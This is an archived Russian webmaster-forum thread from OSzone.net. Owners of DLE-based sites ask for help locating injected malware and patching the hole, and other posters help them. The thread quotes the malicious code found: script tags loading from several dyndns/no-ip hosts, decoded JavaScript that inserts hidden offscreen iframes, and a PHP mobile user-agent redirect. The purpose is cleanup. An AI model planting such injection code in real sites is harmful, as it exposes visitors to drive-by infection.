Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Вебмастеру (http://forum.oszone.net/forumdisplay.php?f=22)
-   -   Вирус на сайте, нужна помощь (http://forum.oszone.net/showthread.php?t=214903)

][alter 05-09-2011 21:59 1746881

Вирус на сайте, нужна помощь
 
Добрый вечер. Сегодня после обеда заметил неприятную особенность на сайте. Постоянно ругается антивирус на разные адреса, так же видно что подвал сайта нарушен. Но тела вируса найти мне не удалось (( Помогите пожалуйста решить проблему, где найти тело вируса и как это лечится ? Сайт unechanews.ru

Delirium 06-09-2011 01:09 1746992

][alter, не вижу проблемы... На сайт не ругается, подвал вроде бы в порядке... А лечится это, как и обычные вирусы - антивирусом. Приведи скрин "ругания" антивируса.

Sham 06-09-2011 08:37 1747084

][alter, приведите подробности, а то будет бан по п. 3.4 :)

][alter 06-09-2011 09:12 1747099

Сегодня я уже попал в под фильтр оперы ((.

В подвале явно что то чужеродное так как он сломан.

Но я не могу найти где что ((


Скрины:

http://imageshack.us/photo/my-images/171/83474025.jpg/

http://imageshack.us/photo/my-images/823/63180071.jpg/

На работе сегодня антивирус не ругается. Буду дома проверю как там дела обстоят.

LilLoco 06-09-2011 10:08 1747118

При заходе на сайт, антивирус NOD, находит угрозу HTML/iframe.B.Gen.

][alter 06-09-2011 10:12 1747122

Да у меня именно nod32 ругается. Как с этим бороться и самое главное как туда это попало?

Sham 06-09-2011 10:17 1747125

в DOM нашел это
Код:

<script src="http://u4a.dyndns.tv/followbb.php?i=19703" language="JavaScript">
Reload the page to get source for: http://u4a.dyndns.tv/followbb.php?i=19703
</script>

грузит это
Код:

var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://sell00.dyndns-ip.com/main.php?page=7f8d1ec15718a56f'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://178.63.96.144/?rbb'; document.body.appendChild(frame); var frame = document.createElement('ifr'+'ame'); frame.style.position = 'absolute'; frame.style.left = '-1000px'; frame.src='http://u4a.dyndns.tv/?inid=19703&intime=657645061'; document.body.appendChild(frame);
смотрите в скриптах, шаблонах, флешках и т.д.

в шаблоне он просто
Код:

<script language='JavaScript' src='http://u4a.dyndns.tv/followbb.php?i=19703'></script>
тот код я с фаербага скопировал (лишний текст)...

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.

][alter 06-09-2011 11:14 1747164

Нашел в index.php.

Цитата:

Проблема не столько в самом ифрейме, сколько в возможности добавить что угодно в шаблон. Смотрите дыры в движке и исправляйте, иначе потеряете данные.
Уже пропадали полностью данные с базы данных, приходилось восстанавливать из бекапа.

Gudzon2 10-03-2013 12:52 2107883

Учитывая что мне уже неплохо помогли на озоне, снова обращаюсь за помощью.
Мое почтение Уважаемые знатоки! Сегодня мне пришло сообщение от Яндекса, что у меня вирус на сайте.
Проверял сайт на вирус тотале, все по нолям.
Решил сам просмотреть через IE HTML своей страницы и обнаружил такую вещь.
Цитата:

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="#" xml:lang="ru" lang="ru">
<link rel="stylesheet" type="text/css" href="/templates/Zevs/css/menu.css"/>
<head>
<div style='z-index:1000; position: fixed; top:90%; right:0px'>
<SCRIPT Language="javascript">
Вот эта хрень и определяется как вирус http://wildfuckers.dyndns.ws/showforum.php?pid=54543
Подскажите пожалуйста, исходя из приведенного куска кода, где мне искать эту падлюку. Сам увы найти не могу.
Помогите пожалуйста!
Могу в случае необходимости залить куда нибуть весь код.
PS Методом тыка выяснилось, что этот код видно,только когда заходишь на сайт без логина своего. Просто как посетитель без аккаунта.

Severny 10-03-2013 13:28 2107898

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script>
Это.
Гугли по этому коду.
Ищи ошибки в модулях CMS.
Прикрывай дырку.

Gudzon2 10-03-2013 13:35 2107906

Severny, Да да дружище. Именно эта хрень, но где ее найти понятия не имею. Перелопатил кучу файлов но так и не смог найти.

Severny 10-03-2013 13:40 2107911

CMS какая?

Gudzon2 10-03-2013 13:47 2107918

Severny, Благодарю за подсказку, буду рыть
DLE 9.7
Еще как вариант
С проверки сайта
Цитата:

List of javascripts included
/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;8

script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

/engine/classes/min/index.php?charset=windows-1251&amp;f=engine/classes/highslide/highslide.js&amp;8

<script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

/templates/Zevs/js/animatedcollapse.js
/templates/Zevs/js/date.js
/engine/modules/SiteVisited/sv.js
/engine/skins/default.js
http://xslt.alexa.com/site_stats/js/...l=stdclub.name
http://wildfuckers.dyndns.ws/showforum.php?pid=54543
http://hostline.ru/index/banner/from/18698/b/pbanner5
http://mc.yandex.ru/metrika/watch.js
http://counter.rambler.ru/top100.jcn?2567385
Может подскажет вам, где мне искать.

Severny 10-03-2013 14:40 2107956

http://forum.searchengines.ru/showthread.php?p=11526772

Gudzon2 10-03-2013 15:08 2107970

Severny, Я был уже там, благодаря вашей подсказке. Уже почти все файлы из папки модули перерыл но так ничего и не нашел :sorry:

Gudzon2 10-03-2013 15:25 2107974

Нашел код в папке modules\файл functions.php
Но вот как он туда сцуко попал, это вопрос уже. :cry:

Severny 10-03-2013 15:58 2107985

Цитата:

Цитата Gudzon2
Но вот как он туда сцуко попал, это вопрос уже. »

Да как, уязвимость. Обнови версию DLE, почитай что люди советуют. Сообщество есть же у вас?
Я вот по своей Modx стараюсь постоянно отслеживать.

У меня тоже было заражение одного сайта на дополнительном домене. Я владельцу дал с дуру админские права для редактирования.
У него система была заражена. Сайт тоже следом.
Хостер начал верещать, что идет рассылка с сайта, прикрыл доступ.
Почему я сделал вывод, что заражение с компа владельца - был заражен только его сайт, остальные дополнительные на этой версии CMS не были заражены.
Посмотри, у кого админские права есть, ограничь, проверь свою систему.

Gudzon2 10-03-2013 16:11 2107994

Severny,
Доступ к файлам сайта, имею только я. Да и в конце то концов, не сайт же Пентагона :lol:
Кому блин понадобился, не понятно.
К файлу functions.php, через админку сайта не подобраться, только по FTP а тут доступ у меня одного.
Пароли блин 15 значные, не верится что кому то понадобилось таки взламывать блин.
И главное, недавно ведь гадость появилась. Проверил бэкап февральский, там нет ничего. По ходу пока в больнице лежал, впиндюрили его. Я так то слежу ведь за этим. буду сейчас девелоперов длевский сношать блин. У меня ведь лицензия, гады такие

Severny 10-03-2013 16:16 2107998

Никто специально и не взламывает. Вирус проходит или через уязвимость, или через комп пользователя, когда права полные.

Цитата:

Цитата Gudzon2
буду сейчас девелоперов длевский сношать блин. У меня ведь лицензия, гады такие »

С презервативом только.

Цитата:

Цитата Gudzon2
только по FTP а тут доступ у меня одного »

Я и говорю, удели внимание своей системе.

Gudzon2 10-03-2013 16:25 2108007

Severny, Очень вам благодарен дружище, за помощь! Система у меня чистая и хорошо защищенная. Хотя и на старуху..., как говорится. Только что скачал от девелоперов патч и установил его. Оченнно сильно звинялись, как ни странно. :o

Severny 10-03-2013 16:27 2108009

Цитата:

Цитата Gudzon2
Оченнно сильно звинялись, как ни странно. »

Ты же обещал их засно...ть до потери пульса )))

Gudzon2 10-03-2013 16:33 2108016

Severny, Да не так уж конечно :laugh: Теперь я ваще :oszone:

Gudzon2 30-05-2013 10:15 2159099

SOS!!!! SOS!!!!
Снова проблема с сайтом, но сейчас вообще тупиковая ситуация. Яша прислал письмо, что сайт заражен.

http://stdclub.name/2013/05/26/
zeroesassay.battingyw.in Troj/ExpJS-IE
Но это блин страница целая и где искать ентого чертового зловреда?
Проверкой на других онлайн сервисах, выдает что сайт чист как невинный ребенок. Что делать? Помогите пожалуйста.
PS нашел информацию что атака связана с statuses.ws
Проверил по рекомендациям файлы
Цитата:

Борьба с дырой:

Думаю ее нужно будет проводить регулярно, так как оффициальный фикс не очень помогает.

Делаем следующее:
1. Открываем engine/data/config.php и dbconfig.php
2. Ищем такой код:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}


3. Сносим к чертям собачьим.
4. Ищем engine/engine.php и там должно быть аж два подобных кода, кстати вставлены они у каждого в разные строчки, так что не буду называть точный номер. Сносим все это.
5. Ищем engine/init.php - там тоже все это убираем
6. В index.php такая штука тоже есть, тоже убираем.
Но указанного кода не нашел.
Люди добрые отзовитесь. Замучился уже откатывать сайт из бэкапов. Помогите справится с вирусом.
Проверил сегодня сайт на http://sitecheck.sucuri.net
Выдал результат неутешительный(((
Цитата:

Malware found in the URL:
http://stdclub.name


Known javascript malware.
Details:
http://sucuri.net/malware/malware-entry-mwjsanon7
<script src="http://vttcmgr.no-ip.org/showforum.php?pid=152" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



Malware found in the URL:
http://stdclub.name/404testpage4525d2fdc


Malware found in the URL:
http://stdclub.name/sitemap


Malware found in the URL:
http://stdclub.name/index.php?do=feedback


Malware found in the URL:
http://stdclub.name/index.php


Malware found in the URL:
http://stdclub.name/add_news.html


Malware found in the URL:
http://stdclub.name/soft/portable_vv07


Malware found in the URL:
http://stdclub.name/index.php?do=register


Malware found in the URL:
http://stdclub.name/katalog.html


Вот эта хрень Known javascript malware.
Details:
http://sucuri.net/malware/malware-entry-mwjsanon7
<script src="http://vttcmgr.no-ip.org/showforum.php?pid=152" type="text/javascript"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
На всех перечисленных страницах.

Gudzon2 30-08-2013 12:35 2210062

Друзья, снова требуется помощь. На этот раз вообще ситуация патовая.
Стоит ограничение доступа к сайту на DLE по IP, но все равно кто то получает доступ. Вносит изменения в файлы сайта.
Как такое возможно?


Время: 01:28.

Время: 01:28.
© OSzone.net 2001-